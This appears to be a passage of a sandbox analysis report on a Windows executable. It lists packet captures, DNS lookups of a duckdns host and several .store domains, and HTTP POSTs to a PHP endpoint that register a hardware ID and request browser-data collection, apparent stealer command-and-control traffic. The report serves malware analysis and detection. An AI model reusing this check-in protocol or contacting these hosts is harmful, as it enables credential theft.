Nov 7, 2024 04:12:28.319473982 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319485903 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319495916 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319500923 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319514990 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319525957 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319539070 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319549084 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319552898 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319561005 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319571018 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319576025 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319582939 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319605112 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319605112 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319612980 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319623947 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319629908 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319637060 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319645882 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319658995 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319673061 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319681883 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319681883 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319681883 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319694042 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319695950 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319706917 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319717884 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319717884 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319730043 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319746017 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319772005 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319773912 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319780111 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319783926 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319796085 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319807053 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319829941 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319830894 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319844007 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319854975 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319865942 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319875002 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319879055 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319884062 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319891930 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319902897 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319914103 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319914103 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319921017 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319926977 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319937944 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.319947004 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.319969893 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320007086 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320019960 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320029974 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320045948 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320051908 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320060015 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320079088 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320082903 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320095062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320106030 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320113897 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320168018 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320226908 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320238113 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320247889 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320261002 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320277929 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320282936 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320290089 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320302010 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320313931 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320323944 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320326090 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320337057 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320344925 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320348024 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320358992 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320360899 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320370913 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320391893 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320395947 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320403099 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320408106 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320419073 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320430040 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320439100 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320440054 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320477009 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320496082 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320497990 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320518017 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320525885 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320538044 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320544958 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320555925 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320559978 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320568085 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320574999 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320584059 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320595980 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320601940 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320636034 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320645094 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320667028 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320708036 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320719004 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320729971 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320753098 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320784092 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320826054 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320857048 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320878029 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320890903 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320897102 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320903063 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.320920944 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.320957899 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321053028 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321064949 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321074963 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321094036 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321100950 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321111917 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321122885 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321124077 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321136951 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321155071 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321156025 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321156025 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321171999 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321183920 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321190119 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321194887 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321197987 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321208954 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321218014 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321222067 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321233988 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321244955 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321249962 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321254969 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321264982 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321269035 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321275949 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321276903 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321290970 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321310997 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321336985 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321367979 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321397066 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321407080 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321408033 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321438074 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321448088 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321449995 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321449995 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321502924 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321507931 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321532011 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321542978 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321547985 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321553946 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321574926 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321587086 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321644068 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321652889 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321695089 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321741104 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321753025 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321763039 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321782112 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321787119 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321799994 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321803093 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321810961 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321811914 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321821928 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321824074 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321836948 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321846008 CET	49762	80	192.168.2.4	185.215.113.16
Nov 7, 2024 04:12:28.321850061 CET	80	49762	185.215.113.16	192.168.2.4
Nov 7, 2024 04:12:28.321873903 CET	80	49762	185.215.113.16	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 7, 2024 04:12:05.864352942 CET	192.168.2.4	1.1.1.1	0xb889	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:12:05.864859104 CET	192.168.2.4	1.1.1.1	0x308c	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 7, 2024 04:12:09.354422092 CET	192.168.2.4	1.1.1.1	0xb389	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:12:09.354572058 CET	192.168.2.4	1.1.1.1	0xa61a	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Nov 7, 2024 04:12:10.349618912 CET	192.168.2.4	1.1.1.1	0xe357	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:12:10.349801064 CET	192.168.2.4	1.1.1.1	0xda92	Standard query (0)	play.google.com	65	IN (0x0001)	false
Nov 7, 2024 04:13:16.403177977 CET	192.168.2.4	1.1.1.1	0xf68	Standard query (0)	dpdnow.duckdns.org	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:17.763526917 CET	192.168.2.4	1.1.1.1	0xa9fa	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:22.458173037 CET	192.168.2.4	1.1.1.1	0xaa79	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:22.484467030 CET	192.168.2.4	1.1.1.1	0xac41	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:22.542592049 CET	192.168.2.4	1.1.1.1	0x7e73	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:22.590409040 CET	192.168.2.4	1.1.1.1	0x8301	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:22.979509115 CET	192.168.2.4	1.1.1.1	0x5bc6	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:23.232286930 CET	192.168.2.4	1.1.1.1	0x7c1d	Standard query (0)	founpiuer.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:36.079045057 CET	192.168.2.4	1.1.1.1	0x16e7	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:36.105643988 CET	192.168.2.4	1.1.1.1	0xc086	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:36.131001949 CET	192.168.2.4	1.1.1.1	0x7815	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:36.138916016 CET	192.168.2.4	1.1.1.1	0x2dc	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:36.163563967 CET	192.168.2.4	1.1.1.1	0xfccb	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 7, 2024 04:12:05.871059895 CET	1.1.1.1	192.168.2.4	0xb889	No error (0)	www.google.com		172.217.16.196	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:12:05.871505976 CET	1.1.1.1	192.168.2.4	0x308c	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 7, 2024 04:12:09.360867977 CET	1.1.1.1	192.168.2.4	0xb389	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 7, 2024 04:12:09.360867977 CET	1.1.1.1	192.168.2.4	0xb389	No error (0)	plus.l.google.com		216.58.206.46	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:12:09.361639023 CET	1.1.1.1	192.168.2.4	0xa61a	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 7, 2024 04:12:10.356442928 CET	1.1.1.1	192.168.2.4	0xe357	No error (0)	play.google.com		142.250.186.78	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:16.511660099 CET	1.1.1.1	192.168.2.4	0xf68	No error (0)	dpdnow.duckdns.org		194.59.31.120	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:17.770107985 CET	1.1.1.1	192.168.2.4	0xa9fa	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:22.480037928 CET	1.1.1.1	192.168.2.4	0xaa79	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:22.521305084 CET	1.1.1.1	192.168.2.4	0xac41	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:22.573318005 CET	1.1.1.1	192.168.2.4	0x7e73	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:22.597450018 CET	1.1.1.1	192.168.2.4	0x8301	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:23.002813101 CET	1.1.1.1	192.168.2.4	0x5bc6	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:23.270505905 CET	1.1.1.1	192.168.2.4	0x7c1d	No error (0)	founpiuer.store		104.21.5.155	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:23.270505905 CET	1.1.1.1	192.168.2.4	0x7c1d	No error (0)	founpiuer.store		172.67.133.135	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:36.100658894 CET	1.1.1.1	192.168.2.4	0x16e7	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:36.129553080 CET	1.1.1.1	192.168.2.4	0xc086	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:36.137882948 CET	1.1.1.1	192.168.2.4	0x7815	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:36.162471056 CET	1.1.1.1	192.168.2.4	0x2dc	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 7, 2024 04:13:36.197067022 CET	1.1.1.1	192.168.2.4	0xfccb	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.215.113.206	80	6816	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 04:11:59.879523993 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 7, 2024 04:12:00.778422117 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 7, 2024 04:12:00.782553911 CET	413	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAFIJKKEHJDHJKFIECAA Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 33 32 46 34 45 41 30 45 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 2d 2d 0d 0a Data Ascii: ------AAFIJKKEHJDHJKFIECAAContent-Disposition: form-data; name="hwid"CA32F4EA0EBD3120641781------AAFIJKKEHJDHJKFIECAAContent-Disposition: form-data; name="build"tale------AAFIJKKEHJDHJKFIECAA--
Nov 7, 2024 04:12:01.072813034 CET	407	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:00 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4e 6a 63 35 4d 7a 41 77 4f 44 59 34 4d 6a 45 30 4f 54 56 6b 4d 57 4d 77 4e 6d 4d 32 4d 44 6c 6c 5a 6d 52 6a 4e 32 52 6b 4e 7a 59 78 4e 47 51 33 59 6a 46 68 4e 6d 49 31 4d 6a 41 7a 59 6d 49 30 4d 44 67 79 4d 54 6c 68 4e 44 55 7a 4d 6a 6c 6d 4d 6a 46 6a 4f 57 52 69 5a 6a 59 78 4f 54 64 69 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: Njc5MzAwODY4MjE0OTVkMWMwNmM2MDllZmRjN2RkNzYxNGQ3YjFhNmI1MjAzYmI0MDgyMTlhNDUzMjlmMjFjOWRiZjYxOTdifHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Nov 7, 2024 04:12:01.074026108 CET	470	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBFIDBFHDBGIDHJJEGHI Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 42 46 49 44 42 46 48 44 42 47 49 44 48 4a 4a 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 39 33 30 30 38 36 38 32 31 34 39 35 64 31 63 30 36 63 36 30 39 65 66 64 63 37 64 64 37 36 31 34 64 37 62 31 61 36 62 35 32 30 33 62 62 34 30 38 32 31 39 61 34 35 33 32 39 66 32 31 63 39 64 62 66 36 31 39 37 62 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 49 44 42 46 48 44 42 47 49 44 48 4a 4a 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 49 44 42 46 48 44 42 47 49 44 48 4a 4a 45 47 48 49 2d 2d 0d 0a Data Ascii: ------FBFIDBFHDBGIDHJJEGHIContent-Disposition: form-data; name="token"67930086821495d1c06c609efdc7dd7614d7b1a6b5203bb408219a45329f21c9dbf6197b------FBFIDBFHDBGIDHJJEGHIContent-Disposition: form-data; name="message"browsers------FBFIDBFHDBGIDHJJEGHI--
Nov 7, 2024 04:12:01.352761984 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:01 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2064 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 58 45 64 76 62 32 64 73 5a 56 78 63 51 32 68 79 62 32 31 6c 58 46 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 63 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4d 48 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 